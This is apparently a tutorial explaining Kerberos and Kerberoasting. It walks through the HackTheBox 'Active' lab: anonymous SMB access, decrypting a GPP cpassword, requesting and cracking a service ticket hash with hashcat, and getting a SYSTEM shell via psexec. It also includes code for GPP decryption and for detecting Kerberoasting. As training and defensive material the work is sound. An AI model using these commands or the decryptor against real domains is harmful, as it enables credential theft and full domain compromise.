What is Kerberos?
Kerberos is the system users within an AD domain can use to authenticate to some service on the network. The following image is a good way to describe the process:
Before you can authenticate to a service, you need to get a Ticket Granting Ticket (TGT) from the Key Distribution Center (KDC), which runs on the Domain Controller. You tell the KDC you want to authenticate and send it a request encrypted with your password hash. The KDC can decrypt that request using your NTLM hash, and it gives you back a TGT encrypted with that same NTLM hash.
Next, you use the TGT to request a ticket for a specific service. The KDC doesn't check whether you have permission to use the service; it simply issues a service ticket (TGS) that is split into two parts: one part is encrypted with the requested service's NTLM hash, and the other is encrypted with the TGT session key.
You send the server half of the ticket to the service, which verifies that it can decrypt it with its own NTLM hash. Only then does it check whether you have any privileges on the resource: it authenticates the request before it authorizes an action.
If you do have the privileges, you can then do what you need to do with the service.
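The flow above, as an added toy model that is not code from the original post and not real Kerberos: SHA-256 stands in for the NT hash, a small HMAC-authenticated toy cipher stands in for RC4-HMAC/AES, message layouts are simplified, and the account names (alice, svc_sql) are hypothetical. It follows real Kerberos in one detail the post glosses over: the TGT itself is sealed under the krbtgt account's key, while the part the client can read (the session key) is sealed under the user's key. What it demonstrates is the post's point: the KDC authenticates but never authorizes, the service half of a TGS is protected only by the service account's key, and that key is derived from nothing but the account's password.

```python
"""Toy model of the TGT / TGS / service flow described above.

Added example, not the post's code and not real Kerberos: SHA-256 stands in
for the NT hash, a small HMAC-authenticated toy cipher stands in for
RC4-HMAC/AES, message layouts are simplified, and the account names are
hypothetical. What it keeps is who holds which key.
"""
import hashlib
import hmac
import json
import os
import time


def key_from_password(password: str) -> bytes:
    """Stand-in for the NT hash: a long-term key derived from the password alone."""
    return hashlib.sha256(password.encode("utf-16-le")).digest()


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    blocks = (length + 31) // 32
    return b"".join(hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest()
                    for i in range(blocks))[:length]


def encrypt(key: bytes, obj: dict) -> bytes:
    """Toy authenticated encryption: nonce || (json XOR keystream) || HMAC tag."""
    data = json.dumps(obj, sort_keys=True).encode()
    nonce = os.urandom(16)
    body = bytes(a ^ b for a, b in zip(data, _keystream(key, nonce, len(data))))
    return nonce + body + hmac.new(key, nonce + body, hashlib.sha256).digest()


def decrypt(key: bytes, blob: bytes) -> dict:
    """Raise ValueError unless `key` is the key the blob was sealed with."""
    nonce, body, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + body, hashlib.sha256).digest()):
        raise ValueError("wrong key")
    return json.loads(bytes(a ^ b for a, b in zip(body, _keystream(key, nonce, len(body)))))


class KDC:
    """Knows every principal's long-term key. Authenticates; never authorizes."""

    def __init__(self, passwords: dict):
        self.keys = {name: key_from_password(pw) for name, pw in passwords.items()}

    def as_exchange(self, user: str, preauth: bytes) -> dict:
        # Pre-authentication: a timestamp sealed under the user's key proves the password.
        stamp = decrypt(self.keys[user], preauth)
        if abs(time.time() - stamp["timestamp"]) > 300:
            raise ValueError("clock skew")
        session = os.urandom(32).hex()
        return {
            # Only the KDC itself can read the TGT (krbtgt key).
            "tgt": encrypt(self.keys["krbtgt"], {"user": user, "session": session}),
            # Only the user can read the session key (user's key).
            "enc_part": encrypt(self.keys[user], {"session": session}),
        }

    def tgs_exchange(self, tgt: bytes, authenticator: bytes, spn_owner: str) -> dict:
        tgt_body = decrypt(self.keys["krbtgt"], tgt)
        session = bytes.fromhex(tgt_body["session"])
        decrypt(session, authenticator)  # proves the caller holds the TGT session key
        svc_session = os.urandom(32).hex()
        # No permission check: any authenticated user gets a ticket for any SPN it names.
        return {
            "service_ticket": encrypt(self.keys[spn_owner],
                                      {"user": tgt_body["user"], "session": svc_session}),
            "enc_part": encrypt(session, {"session": svc_session}),
        }


def service_accepts(service_key: bytes, ticket: bytes, acl: set) -> bool:
    """Authenticate (decrypt with our own key) first, then authorize against the ACL."""
    try:
        user = decrypt(service_key, ticket)["user"]
    except ValueError:
        return False
    return user in acl


def ticket_matches_password(ticket: bytes, guess: str) -> bool:
    """The service half of a TGS lets its holder test a password guess with no KDC involved."""
    try:
        decrypt(key_from_password(guess), ticket)
        return True
    except ValueError:
        return False


def run_flow(passwords: dict, user: str, spn_owner: str) -> bytes:
    """Client side of the three exchanges; returns the service ticket the client ends up holding."""
    kdc = KDC(passwords)
    user_key = key_from_password(passwords[user])
    reply = kdc.as_exchange(user, encrypt(user_key, {"timestamp": time.time()}))
    session = bytes.fromhex(decrypt(user_key, reply["enc_part"])["session"])
    tgs = kdc.tgs_exchange(reply["tgt"], encrypt(session, {"user": user}), spn_owner)
    return tgs["service_ticket"]


if __name__ == "__main__":
    pw = {"krbtgt": "long-random-kdc-secret", "alice": "alice-password", "svc_sql": "Summer2018"}
    ticket = run_flow(pw, "alice", "svc_sql")
    print("service accepts alice:", service_accepts(key_from_password("Summer2018"), ticket, {"alice"}))
    print("ticket verifies a password guess offline:", ticket_matches_password(ticket, "Summer2018"))
```

Note that `ticket_matches_password` never contacts the KDC: once a ticket for svc_sql has been issued to any authenticated user, the only thing standing between that ticket and the account's password is the password's strength, which is the whole reason the prevention advice at the end of this post focuses on service account passwords.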
Okay, so how can this be taken advantage of?
Well, with Kerberoasting.
What is Kerberoasting?
So, because of how this works, your system doesn't need to know the account name behind the service, but the KDC does, so it can encrypt the server portion of the TGS with that account's key. Specifically, the KDC needs to know the SPN (Service Principal Name), which uniquely identifies the service and ties it to the account whose key seals the ticket.
There is also a distinction to be made between computer accounts and user accounts. User accounts are the ones people log in with, while computer account passwords are typically auto-rotated, long, and random. So we will likely only be able to crack a user-account SPN.
We can use something like GetUserSPNs to enumerate user accounts that have an SPN set, implying that they are service accounts, and then try to crack the resulting hashes. The tool simply requests a TGS for each unique user account that has an SPN.
Let’s walk through an example using things we have already learned so far.
Example - HTB Active
We begin with a port scan that shows a ton of open ports, one of which is SMB, and we can see that some of the shares can be listed anonymously:
╰─ smbclient -L 10.129.168.186
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.168.186 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
We can look around in Replication and find an interesting file called Groups.xml:
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
. D 0 Sat Jul 21 05:37:44 2018
.. D 0 Sat Jul 21 05:37:44 2018
Groups.xml A 533 Wed Jul 18 15:46:06 2018
5217023 blocks of size 4096. 237617 blocks available
If we download this and view it, we see a password being stored here for a service account:
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
This is a GPP cpassword, which used to be how Microsoft stored AES-encrypted passwords in Group Policy Preferences, until they accidentally published the key used to encrypt them. We can decrypt it with gpp-decrypt like this:
╰─ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
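The same decryption done by hand, as an added example that is not part of the original post and not the gpp-decrypt tool: it applies AES-256-CBC with the key Microsoft published in its MSDN documentation (the one every GPP decryptor uses), a zero IV and PKCS#7 padding, then decodes the UTF-16LE plaintext. It also walks a GPP XML file for every element carrying a cpassword attribute, which is how a defender would audit SYSVOL for leftover credentials; the embedded XML is the Groups.xml shown above. It assumes the `cryptography` package (or PyCryptodome as a fallback) is installed; neither is mentioned on the page.

```python
"""Audit Group Policy Preference XML for cpassword values.

Added example, not the post's code. Assumptions: AES-256-CBC with the key
Microsoft published in MSDN (MS14-025), zero IV, PKCS#7 padding, UTF-16LE
plaintext; the `cryptography` package or PyCryptodome must be installed.
"""
import base64
import xml.etree.ElementTree as ET

try:
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def _aes_cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
        dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
        return dec.update(data) + dec.finalize()
except ImportError:  # fall back to PyCryptodome if that is what is installed
    from Crypto.Cipher import AES

    def _aes_cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
        return AES.new(key, AES.MODE_CBC, iv).decrypt(data)

# The 32-byte AES key Microsoft documented for GPP. Being public is exactly
# why cpassword gives no real protection.
GPP_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)


def gpp_decrypt(cpassword: str) -> str:
    """Turn one cpassword attribute value into the clear-text password."""
    # GPP drops the base64 '=' padding; restore it so the decoder accepts it.
    padded = cpassword + "=" * (-len(cpassword) % 4)
    plaintext = _aes_cbc_decrypt(GPP_KEY, b"\x00" * 16, base64.b64decode(padded))
    # Strip PKCS#7 padding (the .NET default GPP used when encrypting).
    pad = plaintext[-1]
    if 1 <= pad <= 16 and plaintext.endswith(bytes([pad]) * pad):
        plaintext = plaintext[:-pad]
    return plaintext.decode("utf-16-le")


def find_cpasswords(xml_text) -> list:
    """Return (account, password) for every element carrying a cpassword.

    Groups.xml, Services.xml, ScheduledTasks.xml, Drives.xml, DataSources.xml
    and Printers.xml all put the value in a cpassword attribute, so the walk
    is the same for each of them.
    """
    if isinstance(xml_text, str):
        xml_text = xml_text.encode("utf-8")
    found = []
    for elem in ET.fromstring(xml_text).iter():
        enc = elem.attrib.get("cpassword")
        if not enc:
            continue
        # Groups.xml names the account in userName; other GPP files use runAs or accountName.
        account = (elem.attrib.get("userName") or elem.attrib.get("runAs")
                   or elem.attrib.get("accountName") or "<unknown>")
        found.append((account, gpp_decrypt(enc)))
    return found


# The Groups.xml pulled from the Replication share above.
GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>"""

if __name__ == "__main__":
    for account, password in find_cpasswords(GROUPS_XML):
        print(f"{account}: {password}")
```

Pointing `find_cpasswords` at each `*.xml` under a domain's `\\<domain>\SYSVOL\<domain>\Policies\` tree is the quickest way to confirm that no cpassword values are left behind after applying MS14-025, since the patch stops new ones being created but does not remove the old ones.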
From here, we can use this credential for further SMB and other post-compromise enumeration. We can also use impacket-GetUserSPNs to request a TGS for another user that has an SPN:
╰─ impacket-GetUserSPNs -dc-ip 10.129.168.186 active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 14:06:40.351723 2024-04-26 22:59:56.568548
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$592c0de873d4244aa705906bc2d79075$3a69a51abb281519ffbd25f3f55aeafeec49f32edadd890ef430f248b4cbbf3bce1c0a94485532194dc9365f0af58e513f36236787365981d1c8118418a931da26936715aa810fb873f2828c9bf4e163b73c214a58c49bfff6e3964db4b4e69814a22379103e0c25d6e00199a856b5225a0ab1b621222e69b776fd43e6d4238775507b230bf186d80e31906bb336eed5738940c7b785f1c7beb4ef8937a364b3b6f428295d2012d1944e5baf1ecf67089dec3fe977922fbb5972b993e954597a6ba41abd6e962428a770111fe69a943c91e83b7d49062cd07ac5f97f46905fd5d89f2f0---SNIP---
We can load this into hashcat (mode 13100, Kerberos 5 TGS-REP etype 23) and give it a crack:
╰─ hashcat -m 13100 hash.txt ~/Desktop/Useful-Misc./rockyou.txt
We get a password and can use it with psexec to get a shell on the DC:
╰─ impacket-psexec administrator:Ticketmaster1968@10.129.168.186
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on 10.129.168.186.....
[*] Found writable share ADMIN$
[*] Uploading file UVLrlMsI.exe
[*] Opening SVCManager on 10.129.168.186.....
[*] Creating service GWiw on 10.129.168.186.....
[*] Starting service GWiw.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
In summary, we found an SMB share exposing a GPP cpassword, which we decrypted, giving us a credential that let us make valid requests to the KDC; the KDC then gave us a TGS for the Administrator account, whose password was crackable.
Preventing Kerberoasting Attacks
The issue isn't really with Kerberos itself, but with easily cracked passwords being used on service accounts. You can mitigate this risk by enforcing a strong password policy on all accounts, including service accounts.
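Password policy removes the payoff, but the request pattern itself is also visible to defenders: every TGS request is logged on the Domain Controller as event 4769, and a GetUserSPNs run looks like one account asking for tickets for many user-account SPNs in seconds, usually with RC4 (etype 0x17), which is what the `$krb5tgs$23$` prefix above encodes. The following is an added example, not code from the original post, that runs those two checks over constructed 4769 events written as JSON lines in a simplified SIEM-export shape; the requesting IP addresses and the svc_* account names are hypothetical, and the user/computer distinction is the one made earlier in this post.

```python
"""Kerberoasting detection over Windows 4769 (service ticket request) events.

Added example, not code from the original post. SAMPLE_4769 is constructed:
one JSON object per line carrying the 4769 fields the logic needs. The IP
addresses and the svc_* service accounts are hypothetical.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_4769 = """\
{"time": "2024-04-26T22:58:10Z", "TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "DC$", "TicketEncryptionType": "0x12", "IpAddress": "10.129.168.50"}
{"time": "2024-04-26T22:59:56Z", "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator", "TicketEncryptionType": "0x17", "IpAddress": "10.129.168.77"}
{"time": "2024-04-26T22:59:57Z", "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "10.129.168.77"}
{"time": "2024-04-26T22:59:57Z", "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "IpAddress": "10.129.168.77"}
{"time": "2024-04-26T22:59:58Z", "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "IpAddress": "10.129.168.77"}
{"time": "2024-04-26T23:30:00Z", "TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "svc_sql", "TicketEncryptionType": "0x12", "IpAddress": "10.129.168.50"}
"""


def parse_events(text: str) -> list:
    """Parse JSON-lines 4769 events; 'time' becomes a datetime."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ev["time"] = datetime.strptime(ev["time"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    return events


def is_user_account_spn(service_name: str) -> bool:
    """Computer accounts end in '$' and krbtgt has a random key; only user accounts are roastable."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def detect_kerberoasting(events, window=timedelta(minutes=5), min_spns=3) -> list:
    """Return (rule, requester, detail) alerts.

    rc4_user_spn: an RC4 (etype 0x17) ticket for a user-account SPN, the
                  downgrade that yields the $krb5tgs$23$ hashes hashcat cracks.
    spn_burst:    one requester collecting tickets for >= min_spns distinct
                  user-account SPNs inside `window`, the shape of a GetUserSPNs run.
    """
    alerts = []
    by_requester = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        if not is_user_account_spn(ev["ServiceName"]):
            continue
        if ev["TicketEncryptionType"].lower() == "0x17":
            alerts.append(("rc4_user_spn", ev["TargetUserName"], ev["ServiceName"]))
        by_requester[ev["TargetUserName"]].append(ev)
    for requester, evs in by_requester.items():
        for i, first in enumerate(evs):
            spns = {e["ServiceName"] for e in evs[i:] if e["time"] - first["time"] <= window}
            if len(spns) >= min_spns:
                alerts.append(("spn_burst", requester, sorted(spns)))
                break  # one burst alert per requester is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoasting(parse_events(SAMPLE_4769)):
        print(*alert)
```

Tune `min_spns` and `window` to the environment: a user who legitimately touches many services will generate AES tickets spread over a workday, not a cluster of RC4 tickets for user-account SPNs within a few seconds.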